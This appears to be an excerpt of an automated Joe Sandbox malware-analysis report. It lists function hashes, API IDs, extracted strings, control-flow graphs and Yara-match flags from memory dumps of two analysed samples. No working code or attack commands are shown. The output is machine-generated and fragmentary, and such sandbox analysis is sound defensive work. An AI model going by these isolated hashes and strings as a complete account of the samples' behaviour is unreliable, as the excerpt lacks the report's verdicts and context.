                                                                                                                              • Opcode ID: 2344bd99d72cf7bfb67ae64b32e660474ebce94cb5d62cfa24c46ce5b30d432b
                                                                                                                              • Instruction ID: 484e7aad8a1ee3e004b12e9a2031dca0c8c0ff5722b24aa5327914e8fcb79bc4
                                                                                                                              • Opcode Fuzzy Hash: 2344bd99d72cf7bfb67ae64b32e660474ebce94cb5d62cfa24c46ce5b30d432b
                                                                                                                              • Instruction Fuzzy Hash: EA811B72D002699BDB35CB58CC44BEAB7B9AB48714F0041DAEA19F7280D7709F84CFA1

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
• Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                              • String ID: l.7&
                                                                                                                              • API String ID: 4281723722-544070020
                                                                                                                              • Opcode ID: 6a43f60b056958133413fc03aed7487ab1e715188924b1f7f45b3dee353d6e6a
                                                                                                                              • Instruction ID: a77e202e9024f04ab0bfed816ac1d37041db7f0546be02dabbea3a669405ae04
                                                                                                                              • Opcode Fuzzy Hash: 6a43f60b056958133413fc03aed7487ab1e715188924b1f7f45b3dee353d6e6a
                                                                                                                              • Instruction Fuzzy Hash: 9C310476E04219EFCF26EFA8D884A9DBBF1BB48720F10412AE511F7290DB359A00CF54

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                              • API String ID: 3446177414-56086060
                                                                                                                              • Opcode ID: b5eab509a92903d8edc950d5c3f32ccb6a67cc08dd28e27477a5cc3252b0e80d
                                                                                                                              • Instruction ID: ec656c1231dbc269e7171b3a360dba492ac650a9b1244eec55e1ae9599809ca0
                                                                                                                              • Opcode Fuzzy Hash: b5eab509a92903d8edc950d5c3f32ccb6a67cc08dd28e27477a5cc3252b0e80d
                                                                                                                              • Instruction Fuzzy Hash: 45414771600245DFD726DF6DC494B6AB7E4EF44724F188169E611C7291C774EB80C7D1

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01894899
                                                                                                                              • LdrpCheckRedirection, xrefs: 0189488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01894888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                                              • Opcode ID: ff129dbd982ec77b471c98b605538171333e7eee084b1dda1ce2d13fe353c697
                                                                                                                              • Instruction ID: 02c8cee69ea1aebdffe1132f0859cec9b0b4a689c2fb1b25158ca30d4e7b9b6b
                                                                                                                              • Opcode Fuzzy Hash: ff129dbd982ec77b471c98b605538171333e7eee084b1dda1ce2d13fe353c697
                                                                                                                              • Instruction Fuzzy Hash: 1241D432A143599FCF22CE5DDA40A2ABBE4BF89754F09055DED48EB311D731DA02CB91

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                              • API String ID: 3446177414-3526935505
                                                                                                                              • Opcode ID: 53caa54c0f22801dda0f158c389df253aa8792afdd31cf7df7afded36bf625af
                                                                                                                              • Instruction ID: e9d746f7bd0280698bb4240cc5a386ae72b18ae38e8286bfcb54291d0b107a9b
                                                                                                                              • Opcode Fuzzy Hash: 53caa54c0f22801dda0f158c389df253aa8792afdd31cf7df7afded36bf625af
                                                                                                                              • Instruction Fuzzy Hash: 553141342487C8DFD727DB2CC819B66BBE8EF01B54F084148E512C7692C7B8EA81C792

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $
                                                                                                                              • API String ID: 3446177414-3993045852
                                                                                                                              • Opcode ID: a46ad5fa9c2e65ff4a820ecddd5525186a00737771923a7c258114700024f662
                                                                                                                              • Instruction ID: da6c8e6c686697cd5645bba064093634a5bbaf4ccc199a03bcf842f5b6ad256a
                                                                                                                              • Opcode Fuzzy Hash: a46ad5fa9c2e65ff4a820ecddd5525186a00737771923a7c258114700024f662
                                                                                                                              • Instruction Fuzzy Hash: 59115E32A04218EFCF16AF98E848A9C7B71FF44764F108219F86AA72D0CB715F50CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9926bae477a916556eb6090b03d0ed50252cf7541d542a5266813736abbe2090
                                                                                                                              • Instruction ID: f5e18fc551320f289086265f05308abfa155bdf5877379bf75be2eed21e04170
                                                                                                                              • Opcode Fuzzy Hash: 9926bae477a916556eb6090b03d0ed50252cf7541d542a5266813736abbe2090
                                                                                                                              • Instruction Fuzzy Hash: 2AE11270D00608DFCB26DFA9D980A9DFBF1BF88314F18456AE656E7221D770AA41CF91
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: ac843522bbb96b06b35fc705299b9e31522e06d4ba7e89567d5bb924e68400c5
                                                                                                                              • Instruction ID: 0c94534f435bcf5c5ba9b0c215f88af59e6c59361affc55ee3909de5232c8642
                                                                                                                              • Opcode Fuzzy Hash: ac843522bbb96b06b35fc705299b9e31522e06d4ba7e89567d5bb924e68400c5
                                                                                                                              • Instruction Fuzzy Hash: 32714575E00219DFDF06EFA8C984ADDBBF5BF48314F14402AEA05EB255D734AA05CBA4
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Bl$l
                                                                                                                              • API String ID: 3446177414-208461968
                                                                                                                              APIs
                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 01855E34
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                              • String ID: pow
                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0$Flst
                                                                                                                              • API String ID: 0-758220159
                                                                                                                              APIs
                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 0183D959
                                                                                                                                • Part of subcall function 01814859: RtlDebugPrintTimes.NTDLL ref: 018148F7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$$
                                                                                                                              • API String ID: 3446177414-233714265
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $
                                                                                                                              • API String ID: 3446177414-3993045852
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: 0$0
                                                                                                                              • API String ID: 3446177414-203156872
                                                                                                                              • Opcode ID: 88263c5b2ab55f6be2b90014394b78b4413f9074023ea0212a563dd62236d333
                                                                                                                              • Instruction ID: 75dc5bc1d9f3ef4ea618496ef49871c628c1d38ccd7fc14d8e880daf378c995f
                                                                                                                              • Opcode Fuzzy Hash: 88263c5b2ab55f6be2b90014394b78b4413f9074023ea0212a563dd62236d333
                                                                                                                              • Instruction Fuzzy Hash: 2F415EB160870A9FD351CF68C944A17BBE5BB89314F048A2EF588DB341D771EA05CB96

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.5%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 12157 599330a 12158 5993324 12157->12158 12159 599332f closesocket 12158->12159

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 83 596dc53-596dc74 84 596dc76-596dc7e 83->84 85 596dcf4-596dd2e call 5994c9a 83->85 88 596dc80-596dcae 84->88 89 596dc19-596dc40 84->89 91 596dd47-596dd66 call 599156a 85->91 92 596dd30-596dd44 call 599185a 85->92 88->85 96 596dd6b-596dd76 91->96 92->91 99 596dd92 96->99 100 596dd78-596dd80 96->100 101 596dd94-596dd9b 99->101 100->101 102 596dd82-596dd88 100->102 104 596dd9d-596dda3 101->104 105 596dda9-596ddb4 101->105 102->101 103 596dd8a-596dd90 102->103 103->101 104->105
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 250e6c34fe1763016df1c2f6af87da29a2436e134e3f9aed025aa13ea3d2f518
                                                                                                                              • Instruction ID: f11f0cd0114040bc218b93aa2567818972bf3f94fd60b2fb437ac7d93a9ff9ee
                                                                                                                              • Opcode Fuzzy Hash: 250e6c34fe1763016df1c2f6af87da29a2436e134e3f9aed025aa13ea3d2f518
                                                                                                                              • Instruction Fuzzy Hash: 9D3146B1A04706FFCB25DF78D8589EABBF4FB4A300F04096AD4694B101D7716459D791

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 599330a-599333d call 596b06a call 5993eda closesocket
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: closesocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2781271927-0
                                                                                                                              • Opcode ID: ded9dcc626c57722737332cb0165a4f0b5a6a2357c0249e959f935da1990eded
                                                                                                                              • Instruction ID: 64493821d579a91afc68c0eb047be187bc338ba5443d2162834b0ae68ba84108
                                                                                                                              • Opcode Fuzzy Hash: ded9dcc626c57722737332cb0165a4f0b5a6a2357c0249e959f935da1990eded
                                                                                                                              • Instruction Fuzzy Hash: 8EE08C35200114BBC624EA99CC04C9B77ADEFC5311B108419FE28A7240D630BA118BF0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (u$1$4$;Q$B$DJ$KL$N?$Q1$W}$c;$kdv$nx$q3$}=$7$P$v
                                                                                                                              • API String ID: 0-3778568043
                                                                                                                              • Opcode ID: ff7462e6592b0619ddeabeea777654d9b3fd42e275dee99f68dbc5008fe29da9
                                                                                                                              • Instruction ID: 58a54e7cea2e5beabbd7f34b082d99db85d5791e363e1e7e6be76a31d4628467
                                                                                                                              • Opcode Fuzzy Hash: ff7462e6592b0619ddeabeea777654d9b3fd42e275dee99f68dbc5008fe29da9
                                                                                                                              • Instruction Fuzzy Hash: 1AF1B2B0D0521CCBDB28CF95C895BECBBB2BB48308F20859AC5697B381C7B55A84DF45
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ?_O
                                                                                                                              • API String ID: 0-3129901135
                                                                                                                              • Opcode ID: 4eb20bd9ff8b1927237b39f7a2bc7f67db70f0cc64fa9ec9f5d2a158ca97ce84
                                                                                                                              • Instruction ID: 535789f2205138ecc6bfb65f84e91ba1aea3a51c949fd718d231768b5069d35e
                                                                                                                              • Opcode Fuzzy Hash: 4eb20bd9ff8b1927237b39f7a2bc7f67db70f0cc64fa9ec9f5d2a158ca97ce84
                                                                                                                              • Instruction Fuzzy Hash: 57F0E9B791002D93CE39DE58A8849FAB36DEF95214F0006DBE94D63100F5B6AA468AD5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b45b848a3d8dc63952e28112be17a89f1db365559c668125f40855f0ef5d5102
                                                                                                                              • Instruction ID: 03bd0d3401c0e7bc8f7d7419e0d2bbe68a03ac09ef4106d547d38a0ac4feaa38
                                                                                                                              • Opcode Fuzzy Hash: b45b848a3d8dc63952e28112be17a89f1db365559c668125f40855f0ef5d5102
                                                                                                                              • Instruction Fuzzy Hash: F0C02B17F202041170103C0E3C037F1F794C45347DD002357DC0CB31005103C40660DC